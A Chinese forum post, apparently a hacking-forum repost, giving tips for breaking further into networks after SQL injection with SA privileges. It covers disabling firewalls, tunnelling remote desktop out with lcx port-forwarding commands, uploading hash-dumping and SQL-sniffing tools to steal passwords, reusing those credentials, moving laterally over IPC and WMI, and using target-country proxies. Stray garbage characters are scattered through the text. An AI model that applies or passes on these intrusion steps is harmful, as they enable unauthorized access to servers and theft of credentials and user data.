当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。$ R0 l) u# \ `" O" D1 ]2 X
" i: y0 ?, L7 a
; r7 z& Y$ R0 o- L" ]4 W& q
5 k) c0 O6 M7 S9 |
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)' L5 ^' `! ~# W; H% _9 d: G" U
% \7 V( U7 Z2 a( n# ]
6 h4 P7 B. e0 ^ k, C& W一、DB机有公网IP.9 C$ ~3 K) V1 F. _7 p
2 ]! A; N' A- i1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
2 n8 x0 t1 Q8 E m3 e
( \2 G9 e# j0 y* \/ W5 J3 i% m4 S2 f- f- f; l8 I) Z7 Y$ {
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.% }* F: [7 L8 W. J' l* @% u
' O5 S5 E& N% f& ]+ ^$ p6 I( A' h* ~% G- K8 Q
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
! V4 N2 c; A( \& c- K! K; M4 [
! d2 w( v/ T! Q: b- [
0 ~: T3 h2 j* Q; y( j4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.6 z' j9 j/ U& L: g1 q
# {3 _- J: P) o8 L
6 C5 E1 F( T; y2 V" b* X& X
) J6 _8 e. [3 t8 N$ ^# O二、DB机只有内网IP" r8 T4 a% R) f* {" b9 H f5 O
- {) f0 e2 I8 ?3 s1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.( w8 S6 t% P2 U$ [8 Z& V i: @
. P6 ^3 z7 o7 J$ j8 I! O8 C0 p; X
3 W, P; Z8 A! K" k8 T/ G2:停掉防火墙和IP策略再从内往外扫描." N( h* C: D+ U0 r! H5 z! ^+ ^
% q5 ?5 M2 E1 e9 Z: D
9 m: l/ Q) f- p7 Y3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
8 N1 l) R' H4 N% @1 A& i
2 A6 T& H9 f; q% }# B
7 S! w( I4 s* B% ~4:学会密码规律分析往往会有惊喜.
; |- \: k9 w) Z! H7 s& r0 I
5 C/ e$ U" U) T; U! a7 z- M
3 ]6 z$ b. O# [5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等$ o0 S' H' s: }. m, G6 w9 g5 O# l
. W6 d ] E" {6 F3 w, ]+ [. [- ^+ E8 d3 c6 ~9 Z* Z
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对